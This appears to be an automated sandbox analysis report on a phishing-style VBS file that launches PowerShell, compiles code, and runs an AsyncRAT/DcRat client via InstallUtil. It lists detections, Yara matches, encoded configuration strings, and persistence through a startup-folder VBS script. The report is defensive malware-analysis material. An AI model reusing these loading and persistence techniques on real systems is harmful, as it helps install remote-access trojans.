Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs	.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B788A push eax; ret	6_2_00007FFEBC8B788B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B0D97 pushad ; ret	6_2_00007FFEBC8B0D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC8B7717 push ebx; retf	6_2_00007FFEBC8B771A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC983CFF push edi; iretd	6_2_00007FFEBC983D06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFEBC980C92 push ecx; iretd	6_2_00007FFEBC980C93

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
